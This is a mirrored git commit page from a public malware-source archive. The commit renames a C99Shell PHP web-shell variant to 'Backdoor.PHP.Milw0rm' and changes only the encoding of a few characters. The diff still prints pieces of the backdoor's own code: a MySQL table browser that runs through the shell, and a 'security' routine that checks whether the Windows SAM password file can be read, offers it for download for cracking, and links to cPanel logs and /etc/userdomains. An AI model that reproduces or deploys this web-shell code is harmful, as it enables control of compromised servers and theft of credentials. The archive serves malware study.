mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-18 17:36:11 +00:00
Rename Backdoor.PHP.C99Shell.ad to Backdoor.PHP.Milw0rm
This commit is contained in:
parent
7e88df459c
commit
b48f27ae97
@ -42,7 +42,7 @@
|
||||
*
|
||||
* Last modify: 14.09.2005
|
||||
*
|
||||
* © milw0rm Crew Defacement. Coded by kangkung
|
||||
* Š milw0rm Crew Defacement. Coded by kangkung
|
||||
*
|
||||
******************************************************************************************************
|
||||
*/
|
||||
@ -741,7 +741,7 @@ function mysql_query_form()
|
||||
if ($tbl_struct)
|
||||
{
|
||||
echo "<td valign=\"top\"><b>Fields:</b><br>";
|
||||
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
|
||||
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "ť <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
|
||||
echo "</td></tr></table>";
|
||||
}
|
||||
}
|
||||
@ -1044,7 +1044,7 @@ if ($act == "sql")
|
||||
{
|
||||
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
|
||||
$c = 0;
|
||||
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>» <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
|
||||
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>ť <a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
|
||||
if (!$c) {echo "No tables found in database.";}
|
||||
}
|
||||
}
|
||||
@ -1340,7 +1340,7 @@ if ($act == "sql")
|
||||
$i++;
|
||||
}
|
||||
echo "<tr bgcolor=\"000000\">";
|
||||
echo "<td><center><b>»</b></center></td>";
|
||||
echo "<td><center><b>ť</b></center></td>";
|
||||
echo "<td><center><b>".$i." table(s)</b></center></td>";
|
||||
echo "<td><b>".$trows."</b></td>";
|
||||
echo "<td>".$row[1]."</td>";
|
||||
@ -1569,7 +1569,7 @@ if ($act == "security")
|
||||
{
|
||||
$v = $_SERVER["WINDIR"]."\repair\sam";
|
||||
if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
|
||||
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
|
||||
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ Š.</font></b><br>";}
|
||||
}
|
||||
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
|
||||
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
|
Loading…
Reference in New Issue
Block a user